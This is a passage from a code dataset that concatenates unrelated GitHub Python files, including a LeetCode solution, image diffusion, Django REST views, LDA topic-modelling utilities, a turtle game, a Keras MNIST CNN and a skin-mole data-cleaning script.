can be used to generate new simulations\n \"\"\"\n\n # load tables\n tables = ts.dump_tables()\n # remove sites\n tables.sites.clear()\n # remove mutations\n tables.mutations.clear()\n # turn this back into a tree sequence\n ts_nomuts = tables.tree_sequence()\n\n # cut tree seuquence into two based on start_time and end_time\n # ts_nomuts_inside =\n # ts_nomuts_outside =\n\n # drop mutations down the tree\n ts_inside = msprime.sim_mutations(\n ts_nomuts_inside,\n rate = inside_mut,\n random_seed = seed\n )\n\n # drop mutations down the tree\n ts_outside = msprime.sim_mutations(\n ts_nomuts_outside,\n rate = outside_mut,\n random_seed = seed\n )\n\n # ts_out = ts_inside + ts_outside\n\n #return(ts)\n pass\n\n","repo_name":"General-Solution/pedigree_tools","sub_path":"pedigree_tools.py","file_name":"pedigree_tools.py","file_ext":"py","file_size_in_byte":25593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"30260443874","text":"class Solution(object):\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if len(s) == 0:\n return 0\n Dict = {s[0]:0}\n DP = [1]\n for i in range(1, len(s)):\n if s[i] not in Dict:\n DP.append(DP[i - 1] + 1)\n else:\n DP.append(min(DP[i - 1] + 1, i - Dict[s[i]]))\n Dict[s[i]] = i\n return max(DP)\n","repo_name":"iicceeddssooddaa/LeetCode","sub_path":"#0003_Longest_Substring_Without_Repeating_Characters.py","file_name":"#0003_Longest_Substring_Without_Repeating_Characters.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"33934101397","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 27 14:30:18 2015\n\n@author: yann\n\"\"\"\n\nimport numpy as np\nfrom scipy import ndimage, misc\nimport matplotlib.pyplot as plt\nimport skimage\n\n\ndef c(I, alpha):\n # diffusion coefficient\n # I: image\n # alpha: diffusion parameter\n return np.exp(-(I/alpha)**2)\n\n\ndef nonlinearDiffusion(I, nbIter, alpha, dt):\n # linear diffusion\n # I: image\n # nbIter: number of iterations\n # dt: step time\n hW = np.array([[1, -1, 0]])\n hE = np.array([[0, -1, 1]])\n hN = np.transpose(hW)\n hS = np.transpose(hE)\n\n Z = I\n\n for i in range(nbIter):\n #print \"%d\" % i\n gW = ndimage.convolve(Z, hW, mode='constant')\n gE = ndimage.convolve(Z, hE, mode='constant')\n gN = ndimage.convolve(Z, hN, mode='constant')\n gS = ndimage.convolve(Z, hS, mode='constant')\n\n Z = Z + dt*(c(np.abs(gW), alpha)*gW + c(np.abs(gE), alpha)*gE\n + c(np.abs(gN), alpha)*gN + c(np.abs(gS), alpha)*gS)\n\n return Z\n\n\nalpha = 0.1\ndt = .05\nI = skimage.io.imread(\"cerveau.png\")/255.\n\nF = nonlinearDiffusion(I, 10, alpha, dt)\nF2 = nonlinearDiffusion(I, 50, alpha, dt)\nskimage.io.imsave(\"cerveau_nld_10.png\", F)\nskimage.io.imsave(\"cerveau_nld_50.png\", F2)\nplt.subplot(1, 3, 1)\nplt.imshow(I, cmap=plt.cm.gray)\nplt.subplot(1, 3, 2)\nplt.imshow(F, cmap=plt.cm.gray)\nplt.subplot(1, 3, 3)\nplt.imshow(F2, cmap=plt.cm.gray)\n","repo_name":"yg42/iptutorials","sub_path":"TB_IPR/TUT.IMG.pde/python/nonlineardiffusion.py","file_name":"nonlineardiffusion.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"63"} +{"seq_id":"36260241396","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom Stat.models import Service, Stat\nfrom Stat.serializers import ServiceSerializer, StatSerializer\nfrom facilitators.models import Facilitator\nfrom facilitators.serializers import FacilitatorSerializer\n\n\n@api_view([\"GET\"])\ndef apiOverview(request):\n routes = {\n 'overview: /api/',\n 'Stats(GET, PUT, POST): /api/stats/',\n 'Stats detail(POST): /api/stats//',\n }\n return Response(routes)\n\n@api_view([\"GET\",\"POST\",\"PUT\",\"DELETE\"])\ndef stats(request, pk=None):\n # get single stat\n if pk and request.method == \"GET\":\n task = Stat.objects.get(id=pk)\n serializer = StatSerializer(task, many=False)\n\n # update stat\n elif pk and request.method == \"PUT\":\n task = Stat.objects.get(id=pk)\n serializer = StatSerializer(instance=task, data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n \n # create new stat\n elif not pk and request.method == \"POST\":\n serializer = StatSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n \n # get all stats\n elif not pk and request.method == \"GET\":\n tasks = Stat.objects.all()\n serializer = StatSerializer(tasks, many=True)\n \n return Response(serializer.data)\n\n@api_view([\"GET\",\"POST\",\"PUT\",\"DELETE\"])\ndef serviceApiView(request, pk=None, stat_pk=None):\n # get services\n if stat_pk and request.method == \"GET\":\n stat = Stat.objects.get(id=stat_pk)\n services = Service.objects.filter(stat=stat)\n serializer = ServiceSerializer(services, many=True)\n\n # update services\n elif stat_pk and request.method == \"PUT\":\n for service in request.data:\n service_instance = Service.objects.get(id=int(service['id']))\n service_serializer = ServiceSerializer(instance=service_instance, data=service)\n # save \n if service_serializer.is_valid():\n service_serializer.save()\n\n stat = Stat.objects.get(id=stat_pk)\n services = Service.objects.filter(stat=stat)\n serializer = ServiceSerializer(services, many=True)\n\n response = {\n 'status': 200,\n 'data': serializer.data\n }\n\n return Response(response)\n\n # if serializer.is_valid():\n # serializer.save()\n \n # create new services\n elif stat_pk and request.method == \"POST\":\n serializer = StatSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n \n # get all stats\n elif not pk and request.method == \"GET\":\n tasks = Stat.objects.all()\n serializer = StatSerializer(tasks, many=True)\n \n return Response(serializer.data)\n\n@api_view([\"GET\",\"PUT\"])\ndef facilitatorChecklistView(request, stat_pk=None, service_pk=None):\n if request.method == 'GET' and stat_pk:\n stat = Stat.objects.get(id=stat_pk)\n return_list = []\n\n for service in stat.services.all():\n fs = service.facilitators_available.all()\n serializer = FacilitatorSerializer(fs, many=True)\n return_list.append({\n 'id': service.id,\n 'service': service.name,\n 'facilitators': serializer.data\n })\n\n if request.method == 'PUT':\n updated_service:dict = request.data\n service = Service.objects.get(id=updated_service.get('id'))\n\n facilitators = []\n # first we create a list of the faciltator models received\n for dic in updated_service.get('facilitators'):\n # facilitator match\n fmatch = Facilitator.objects.get(id=dic.get('id'))\n facilitators.append(fmatch)\n \n # clear the facilitators available field\n service.facilitators_available.clear()\n # set the list as the cleared field\n service.facilitators_available.set(facilitators)\n # save the service\n service.save()\n\n return_list = True\n\n\n return Response(return_list)\n\n@api_view([\"GET\"])\ndef facilitatorsApiView(request):\n if request.method == 'GET':\n fs = Facilitator.objects.filter(active=True)\n serializer = FacilitatorSerializer(fs, many=True)\n return Response(serializer.data)\n","repo_name":"eliHeist/morphstats","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40850306606","text":"import string\nimport pandas as pd\nimport numpy as np\nimport re\nimport spacy\nimport gensim\nimport gensim.corpora as corpora\n\nfrom typing import Dict, List, Tuple, Generator\nfrom nltk.corpus import stopwords\nfrom collections import Counter\nfrom wordcloud import WordCloud\nfrom gensim.utils import simple_preprocess\n\n\n\ndef clean_text(dataframe: pd.DataFrame) -> List[List[str]]:\n nlp = spacy.load(\"en_core_web_sm\")\n documents = dataframe[\"commit_message\"].to_list()\n stop_words = stopwords.words(\"english\")\n stop_words.extend([\"mb\", \"et\", \"al\", \"use\", \"yml\" \"also\", \"md\", \"zip\", \"gcs\", \"com\", \"jsonl\", \"json\",\n \"http\", \"huggingtweet\", \"spm\", \"pth\", \"https\", \"sa\", \"cc\", \"py\", \"ab\", \"png\", \"jpg\", \"mp4\", \n \"dataset\", \"datum\", \"information\", \"neededmore\", \"model\", \"huggingface\", \"txt\", \"pkl\"])\n punctuation = set(string.punctuation)\n\n documents = [re.sub(\"\\S*@\\S*\\s?\", \"\", document) for document in documents]\n documents = [_remove_emojis(document) for document in documents]\n documents = list(_convert_to_words(documents))\n documents = [[word for word in document if word not in stop_words] for document in documents]\n documents = _lemmatize(documents, nlp)\n documents = [[word for word in document if word not in stop_words] for document in documents]\n\n return documents\n\n\ndef build_bigrams(documents: List[List[str]]) -> Tuple[List[List[str]], gensim.models.phrases.Phraser]:\n bigram = gensim.models.Phrases(documents, min_count=5, threshold=100)\n bigram_mod = gensim.models.phrases.Phraser(bigram)\n bigrams = [bigram_mod[document] for document in documents]\n\n return (bigrams, bigram_mod)\n\ndef build_trigrams(documents: List[List[str]], bigram: gensim.models.phrases.Phraser) -> List[List[str]]:\n trigram = gensim.models.Phrases(bigram[documents], threshold=100)\n trigram_mod = gensim.models.phrases.Phraser(trigram)\n trigrams = [trigram_mod[document] for document in documents]\n\n return trigrams\n\n\ndef create_model(documents: List[List[str]], num_topics: int) -> Tuple[\n List[List[str]], \n corpora.Dictionary, \n gensim.models.ldamodel.LdaModel\n ]:\n\n id2word = corpora.Dictionary(documents)\n corpus = [id2word.doc2bow(document) for document in documents]\n\n\n lda_model = gensim.models.ldamodel.LdaModel(\n corpus=corpus, id2word=id2word, num_topics=num_topics,\n chunksize=100, passes=100,\n per_word_topics=True\n )\n\n return (corpus, id2word, lda_model)\n\n\ndef _lemmatize(\n documents: List[List[str]],\n nlp: spacy.Language, \n allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV'],\n) -> List[List[str]]:\n resulting_docs = []\n\n for document in documents:\n new_doc = nlp(\" \".join(document))\n tokens = [token.lemma_ for token in new_doc if token.pos_ in allowed_postags]\n resulting_docs.append(tokens)\n \n return resulting_docs\n\ndef _convert_to_words(documents: str) -> Generator[str, None, None]:\n for document in documents:\n yield simple_preprocess(document, deacc=True, min_len=3)\n\n\ndef extract_dominant_topics(\n model: gensim.models.LdaModel, \n corpus: List[List[str]],\n documents: List[str],\n named_topics: Dict[int, str]\n ) -> pd.DataFrame:\n cols = [\"Dataset\", \"Dominant Topic\", \"Percentage(%)\"]\n values = []\n\n for index, topic_val in enumerate(model[corpus]):\n row = sorted(topic_val[0], key = lambda x: (x[1]), reverse=True)\n dominant_topic = named_topics.get(row[0][0])\n dominant_topic_percentage = (row[0][1] * 100) \n document = documents[index]\n\n values.append([document, dominant_topic, dominant_topic_percentage])\n \n return pd.DataFrame(values, columns=cols)\n\n\ndef clean_titles(title: str) -> str:\n new_title = title.strip()\n new_title = _remove_emojis(new_title)\n new_title = new_title.encode(\"ascii\", errors=\"ignore\")\n new_title = new_title.decode(\"ascii\")\n new_title = re.sub(r\"http\\S+\", \"\", new_title)\n\n if len(new_title) > 50:\n new_title = new_title[:20]\n\n return new_title\n\n\n\ndef create_cat_dataframe(topic_dataframe: pd.DataFrame, total: int) -> Tuple[List[str], List[int]]:\n topics = topic_dataframe[\"dominant_topic\"].to_list()\n counter = Counter(topics)\n cols = []\n quantities = []\n percentages = []\n\n for key, value in counter.items():\n cols.append(f\"Topic {key}\")\n\n curr_quantity = value\n curr_percentage = np.round((value / total), decimals=4) * 100\n\n quantities.append(value)\n percentages.append(curr_percentage)\n\n df = pd.DataFrame([quantities, percentages], columns=cols)\n\n return (df, cols, counter.values())\n\n\ndef generate_wordcloud(\n model: gensim.models.LdaModel,\n topic: int,\n named_topics: Dict[int, str],\n max_words: int\n) -> Tuple[str, WordCloud]:\n named_topic = named_topics.get(topic)\n words = model.show_topic(topic)\n text = {word: value for word, value in words}\n wordcloud = WordCloud(background_color=\"white\", width=600, height=400, max_words=max_words, colormap=\"plasma\")\n wordcloud.generate_from_frequencies(text)\n\n return (named_topic, wordcloud)\n\n\ndef create_tsne(model: gensim.models.LdaModel, corpus: List[List[int]]) -> Tuple[np.ndarray, np.ndarray]:\n topic_weights = []\n topics = model[corpus]\n\n for index, topic in enumerate(topics):\n weights = [weight for _, weight in topic[0]]\n topic_weights.append(weights)\n\n df_weights = pd.DataFrame(topic_weights).fillna(0).values\n df_weights = df_weights[np.amax(df_weights, axis=1) > 0.35]\n dominant_topics = np.argmax(df_weights, axis=1)\n\n return (df_weights, dominant_topics)\n\n\ndef _remove_emojis(document: str) -> str:\n emoj = re.compile(\"[\"\n u\"\\U0001F600-\\U0001F64F\" # emoticons\n u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n u\"\\U00002500-\\U00002BEF\" # chinese char\n u\"\\U00002702-\\U000027B0\"\n u\"\\U00002702-\\U000027B0\"\n u\"\\U000024C2-\\U0001F251\"\n u\"\\U0001f926-\\U0001f937\"\n u\"\\U00010000-\\U0010ffff\"\n u\"\\u2640-\\u2642\" \n u\"\\u2600-\\u2B55\"\n u\"\\u200d\"\n u\"\\u23cf\"\n u\"\\u23e9\"\n u\"\\u231a\"\n u\"\\ufe0f\" # dingbats\n u\"\\u3030\"\n \"]+\", re.UNICODE)\n \n return re.sub(emoj, \"\", document)\n\n","repo_name":"Elang89/hf-evolution","sub_path":"notebooks/scripts/lda_utils.py","file_name":"lda_utils.py","file_ext":"py","file_size_in_byte":6417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"45417644148","text":"import pandas\nimport turtle\nscreen = turtle.Screen()\nscreen.title('U.S. States Game')\nimage = \"blank_states_img.gif\"\nscreen.addshape(image)\nturtle.shape(image)\nloop = True\ndata = pandas.read_csv('./50_states.csv')\nall_states = data.state.to_list()\n# print(all_states)\ncount = 0\ntotal = []\n\n# print(all_states)\nwhile len(total) < 50:\n answer_state = screen.textinput(title=f' {len(total)}/50 Guess the State', prompt=\"What's another state's name?\")\n answer = answer_state.capitalize()\n\n if answer in all_states:\n print('YEs')\n total.append(answer)\n print(answer)\n tur = turtle.Turtle()\n tur.hideturtle()\n tur.penup()\n date_state = data[data.state == answer]\n tur.goto(int(date_state.x), int(date_state.y))\n tur.write(answer)\n elif answer == 'Exit':\n miss_state = [state for state in all_states if answer not in total]\n new_data = pandas.DataFrame(miss_state)\n new_data.to_csv('state to learn.csv')\n break\n\n\n\n# import pandas\n# weather = {\n# 'day': ['monday', 'tuesday', 'wednesday'],\n# 'temp': [30, 40, 34]\n# }\n#\n# data = pandas.DataFrame(weather)\n#\n# for (index, row) in data.iterrows():\n# print(row.temp)","repo_name":"khaleel3020/us_states_game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"27223025002","text":"from playwright.sync_api import Page\r\nfrom repository import loginObject\r\n\r\n\r\nclass LoginPage:\r\n def __init__(self, page: Page):\r\n self.organization_input = page.locator(loginObject.username)\r\n\r\n\r\nif __name__ == '__main__':\r\n page: Page\r\n loginPage = LoginPage(page)\r\n loginPage.organization_input.fill()\r\n","repo_name":"xuzihaode/Playwright-Demo","sub_path":"pages/login_page.py","file_name":"login_page.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34394438413","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\n\"\"\"\n@version: ??\n@author: pengshp\n@license: Apache Licence \n@contact: pengshp@gmail.com\n@site: https://pengshp.github.io\n@software: PyCharm Community Edition\n@file: pip3-upgrade-all.py\n@time: 2017/3/1 下午10:28\n\"\"\"\nimport pip\nfrom subprocess import call\n\n\ndef upgrade_all():\n print(\"Upgrading all outdated packages......\")\n for dist in pip.get_installed_distributions():\n call(\"pip install --upgrade \" + dist.project_name, shell=True)\n\n\nif __name__ == '__main__':\n upgrade_all()\n print(\"Upgrade finished!\")\n","repo_name":"pengshp/PythonHub","sub_path":"spider/pip3-upgrade-all.py","file_name":"pip3-upgrade-all.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"19025481181","text":"from skimage import data, io, filters\n\ndef getPixelColor(img, x, y):\n '''\n usar threading;\n conferir OutOfRange;\n calcular cor;\n retornar cor;\n '''\n return (0,0,0) #(R,G,B)\n\n\nimage = data.chelsea()\nwidth, heigth, s = image.shape\n\nfor i in range(0, width):\n for j in range(0, heigth):\n image[i,j] = getPixelColor(image, i, j)\n\nio.imshow_collection((data.chelsea(),image))\nio.show()\n","repo_name":"timaonaliza/Python","sub_path":"ImageResize.py","file_name":"ImageResize.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"14956248402","text":"# <20.2.29> by KH\n\n'''\n75 page\nCNN in Keras\n'''\n\nimport keras\nfrom keras.datasets import mnist # Modified National Institute of Standards and Technology\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom keras import backend as K\n\nbatch_size = 128\nepochs = 2\n\n# We know we have 10 classes\n# which are the digits from 0~9\nnum_classes = 10\n\n# the data, split between train and test sets\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\n# input image dimensions\nimg_rows, img_cols = X_train[0].shape\n\n# Reshaping the data to use it in our network\nif K.image_data_format() == 'channels_first':\n X_train = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)\n X_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\nelse:\n X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)\n X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n\n# Scaleing the data\nX_train = X_train / 255.0\nX_test = X_test/255.0\n\nplt.imshow(X_test[1][...,0], cmap='Greys')\nplt.axis('off')\nplt.show()\n\n# convert class vectors to binary class matrices\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size = (3,3),\n activation = 'relu',\n input_shape = input_shape))\nmodel.add(Conv2D(32, (3, 3), activation = 'relu'))\nmodel.add(MaxPooling2D(pool_size = (2,2)))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.3))\nmodel.add(Dense(num_classes, activation='softmax'))\n\nloss = 'categorical_crossentropy'\noptimizer = 'adam'\n\nmodel.compile(\n loss=loss, optimizer=optimizer, metrics = ['accuracy'])\n\nmodel.fit(X_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose = 1,\n validation_data = (X_test, y_test))\nscore = model.evaluate(X_test, y_test, verbose=0)\n\nprint(f'Test loss: { score[0]} - Test accuracy: {score[1]}')\n","repo_name":"newoni/Neural-Network-Practice","sub_path":"python files/practice11.py","file_name":"practice11.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"5195048010","text":"N, M = map(int, input().split())\n\nB = list(map(int, input().split()))\n\nflag = True\nfor i, b in enumerate(B):\n if b % 7 == 0:\n if i != M-1:\n flag = False\n\npre_b = B[0] + 1\nfor j in B[1:]:\n if pre_b != j:\n flag = False\n pre_b += 1\n\nnext_b = \" \".join([str(i+7) for i in B])\nfor j in range(N-1):\n B = list(map(int, next_b.split()))\n b = input()\n if next_b != b:\n flag = False\n next_b = \" \".join(str(i+7) for i in B)\n\nprint(\"Yes\" if flag else \"No\")\n\n\n\n\n","repo_name":"corawada/Atcoder","sub_path":"abc/abc225/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23175777429","text":"import heapq\nN = int(input())\na = list(map(int,input().split()))\nfa = a[:N:]\nba = list(map(lambda x: x*(-1), a[2*N::]))\nheapq.heapify(fa)\nheapq.heapify(ba)\nsumf = sum(fa)\nsumb = sum(ba)\nsuml = [sumf]\n\nk = -2\n\nfor i in range(N, 2*N):\n heapq.heappush(fa, a[i])\n sumf += a[i]\n sumf -= heapq.heappop(fa)\n suml.append(sumf)\n\nsuml[-1] += sumb\n\nfor j in range(2*N-1, N-1, -1):\n heapq.heappush(ba, -a[j])\n sumb -= a[j]\n sumb -= heapq.heappop(ba)\n suml[k] += sumb\n k -= 1\n \n\n\nprint(max(suml))\n\n\n \n","repo_name":"kyojinatsubori/RoadToRedCoder","sub_path":"Snishiki/Ant/初級/データ構造/D(priority queue).py","file_name":"D(priority queue).py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11255190382","text":"\"\"\"\nSubplots with bitwise operations between images\n\"\"\"\nfrom os.path import join\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nfrom __init__ import assetsdir, rgb2gray, threshold, inverted_threshold\nfrom skimage import exposure\nfrom skimage.filters import threshold_otsu, threshold_local, threshold_mean\n\nimg1 = rgb2gray(mpimg.imread(join(assetsdir, \"Mars_Perseverance_descent_1.png\")))\nimg_eq = exposure.equalize_hist(mpimg.imread(join(assetsdir, \"Mars_Perseverance_descent_1.png\")))\nimg_otsu = img1 > threshold_otsu(img1)\n\nprint(img1.shape, img_eq.shape, img_otsu.shape)\n\n_, axs = plt.subplots(2, 3, constrained_layout=True)\nplt.axis(\"off\")\n\nprint(axs)\n\naxs[0, 0].imshow(img1)\naxs[0, 0].set_title('image')\n\naxs[0, 1].imshow(img_eq)\naxs[0, 1].set_title(\"histogram equalize\")\n\naxs[0, 2].set_title(\"otsu\")\naxs[0, 2].imshow(img_otsu)\n\n#\n# bitwise ops\n#\naxs[1, 0].set_title(\"NOT otsu\")\naxs[1, 0].imshow(np.bitwise_not(img_otsu))\n\naxs[1, 1].set_title(\"NOT tresh mean\")\naxs[1, 1].imshow(np.bitwise_not(img1 > threshold_mean(img1)))\n\naxs[1, 2].set_title(\"otsu XOR thresh mean\")\naxs[1, 2].imshow(np.bitwise_xor(img_otsu, img1 > threshold_mean(img1)))\n\n\nplt.show()","repo_name":"Mec-iS/ndarray-imaging","sub_path":"src/perseverance/landing_jezero_west_bitwise.py","file_name":"landing_jezero_west_bitwise.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"32590212445","text":"\"\"\"Extended image transformations to `torchvision`.\"\"\"\nfrom __future__ import division\n\nimport random\nimport numpy as np\nimport cv2\nimport data.transforms.utils.functional_cv as vf\nfrom data.transforms.utils.functional_cv import get_interp_method\n\n\ndef imresize(src, w, h, interp=1):\n \"\"\"Resize image.\"\"\"\n oh, ow, _ = src.shape\n return vf.resize(src, (w, h), interpolation=get_interp_method(interp, (oh, ow, h, w)))\n\n\ndef resize_short_within(img, short, max_size, mult_base=1, interp=2):\n \"\"\"Resizes shorter edge to size but make sure it's capped at maximum size.\"\"\"\n h, w, _ = img.shape\n im_size_min, im_size_max = (h, w) if w > h else (w, h)\n scale = float(short) / float(im_size_min)\n if np.round(scale * im_size_max / mult_base) * mult_base > max_size:\n scale = float(np.floor(max_size / mult_base) * mult_base) / float(im_size_max)\n new_w, new_h = (int(np.round(w * scale / mult_base) * mult_base),\n int(np.round(h * scale / mult_base) * mult_base))\n return vf.resize(img, (new_h, new_w), get_interp_method(interp, (h, w, new_h, new_w)))\n\n\nnumeric_types = (float, int, np.generic)\n\n\ndef random_expand(src, max_ratio=4, fill=0, keep_ratio=True):\n \"\"\"Random expand original image with borders, this is identical to placing\n the original image on a larger canvas.\n\n Parameters\n ----------\n src : mxnet.nd.NDArray\n The original image with HWC format.\n max_ratio : int or float\n Maximum ratio of the output image on both direction(vertical and horizontal)\n fill : int or float or array-like\n The value(s) for padded borders. If `fill` is numerical type, RGB channels\n will be padded with single value. Otherwise `fill` must have same length\n as image channels, which resulted in padding with per-channel values.\n keep_ratio : bool\n If `True`, will keep output image the same aspect ratio as input.\n\n Returns\n -------\n mxnet.nd.NDArray\n Augmented image.\n tuple\n Tuple of (offset_x, offset_y, new_width, new_height)\n\n \"\"\"\n if max_ratio <= 1:\n return src, (0, 0, src.shape[1], src.shape[0])\n\n h, w, c = src.shape\n ratio_x = random.uniform(1, max_ratio)\n if keep_ratio:\n ratio_y = ratio_x\n else:\n ratio_y = random.uniform(1, max_ratio)\n\n oh, ow = int(h * ratio_y), int(w * ratio_x)\n off_y = random.randint(0, oh - h)\n off_x = random.randint(0, ow - w)\n\n # make canvas\n if isinstance(fill, numeric_types):\n dst = np.full(shape=(oh, ow, c), val=fill, dtype=src.dtype)\n else:\n fill = np.array(fill, dtype=src.dtype)\n if not c == fill.size:\n raise ValueError(\"Channel and fill size mismatch, {} vs {}\".format(c, fill.size))\n dst = np.tile(fill.reshape((1, c)), reps=(oh * ow, 1)).reshape((oh, ow, c))\n\n dst[off_y:off_y + h, off_x:off_x + w, :] = src\n return dst, (off_x, off_y, ow, oh)\n\n\ndef fixed_crop(src, x0, y0, w, h, size=None, interp=2):\n \"\"\"Crop src at fixed location, and (optionally) resize it to size.\n\n Parameters\n ----------\n src : NDArray\n Input image\n x0 : int\n Left boundary of the cropping area\n y0 : int\n Top boundary of the cropping area\n w : int\n Width of the cropping area\n h : int\n Height of the cropping area\n size : tuple of (w, h)\n Optional, resize to new size after cropping\n interp : int, optional, default=2\n Interpolation method. See resize_short for details.\n\n Returns\n -------\n NDArray\n An `NDArray` containing the cropped image.\n \"\"\"\n out = src[y0:y0 + h, x0:x0 + w, :]\n if size is not None and (w, h) != size:\n sizes = (h, w, size[1], size[0])\n out = cv2.resize(out, *size, interpolation=get_interp_method(interp, sizes))\n return out\n\n\ndef random_flip(src, px=0, py=0, copy=False):\n \"\"\"Randomly flip image along horizontal and vertical with probabilities.\n\n Parameters\n ----------\n src : mxnet.nd.NDArray\n Input image with HWC format.\n px : float\n Horizontal flip probability [0, 1].\n py : float\n Vertical flip probability [0, 1].\n copy : bool\n If `True`, return a copy of input\n\n Returns\n -------\n mxnet.nd.NDArray\n Augmented image.\n tuple\n Tuple of (flip_x, flip_y), records of whether flips are applied.\n\n \"\"\"\n flip_y = np.random.choice([False, True], p=[1 - py, py])\n flip_x = np.random.choice([False, True], p=[1 - px, px])\n if flip_y:\n src = np.flip(src, axis=0)\n if flip_x:\n src = np.flip(src, axis=1)\n if copy:\n src = src.copy()\n return src, (flip_x, flip_y)\n\n\n# for center_net\ndef get_3rd_point(a, b):\n direct = a - b\n return b + np.array([-direct[1], direct[0]], dtype=np.float32)\n\n\ndef get_dir(src_point, rot_rad):\n sn, cs = np.sin(rot_rad), np.cos(rot_rad)\n\n src_result = [0, 0]\n src_result[0] = src_point[0] * cs - src_point[1] * sn\n src_result[1] = src_point[0] * sn + src_point[1] * cs\n\n return src_result\n\n\ndef get_affine_transform(center, scale, rot, output_size, shift=np.array([0, 0]), inv=0):\n if not isinstance(scale, np.ndarray) and not isinstance(scale, list):\n scale = np.array([scale, scale], dtype=np.float32)\n\n scale_tmp = scale\n src_w = scale_tmp[0]\n dst_w = output_size[0]\n dst_h = output_size[1]\n\n rot_rad = np.pi * rot / 180\n src_dir = get_dir([0, src_w * -0.5], rot_rad)\n dst_dir = np.array([0, dst_w * -0.5], np.float32)\n\n src = np.zeros((3, 2), dtype=np.float32)\n dst = np.zeros((3, 2), dtype=np.float32)\n src[0, :] = center + scale_tmp * shift\n src[1, :] = center + src_dir + scale_tmp * shift\n dst[0, :] = [dst_w * 0.5, dst_h * 0.5]\n dst[1, :] = np.array([dst_w * 0.5, dst_h * 0.5], np.float32) + dst_dir\n\n src[2:, :] = get_3rd_point(src[0, :], src[1, :])\n dst[2:, :] = get_3rd_point(dst[0, :], dst[1, :])\n\n if inv:\n trans = cv2.getAffineTransform(np.float32(dst), np.float32(src))\n else:\n trans = cv2.getAffineTransform(np.float32(src), np.float32(dst))\n\n return trans\n\n\ndef affine_transform(pt, t):\n new_pt = np.array([pt[0], pt[1], 1.], dtype=np.float32).T\n new_pt = np.dot(t, new_pt)\n return new_pt[:2]\n","repo_name":"ZHANG-SHI-CHANG/pytorch-cv","sub_path":"data/transforms/utils/image_cv.py","file_name":"image_cv.py","file_ext":"py","file_size_in_byte":6263,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"72848975242","text":"##\n## Please make sure your work space\nimport pandas\nimport os\nimport shutil\nimport PIL.Image as pil\nimport xml.etree.ElementTree as et\nimport numpy\nstrOutputPath = \"Output/\"\ntry:\n os.makedirs(strOutputPath)\nexcept:\n shutil.rmtree(strOutputPath)\n os.makedirs(strOutputPath)\n################################################################################\n##\n## 1. Clean table\n##\n## Original data table\ndataTable = pandas.read_csv(\"Data/Table.csv\")\n##\n## Select with doctor give result\n## All row data have result\nsetDoctor = set(['Jack Li', 'Eric Lin 林','Christine(王筱涵)'])\ndataTable = dataTable.iloc[[i in setDoctor for i in dataTable[\"doctor\"]]]\ndataTable[[\"user_id\", \"doctor\"]].groupby([\"doctor\"]).count()\n##\n## Encode result\nstrNotMoleTag = [\n '這不是痣, 可能是角化斑(老人斑), None',\n '這不是痣, 其他, None'\n '這不是痣, 可能是血管瘤, None',\n '這不是痣, 其他, scar',\n '這不是痣, 可能是黑斑, None',\n '這不是痣, 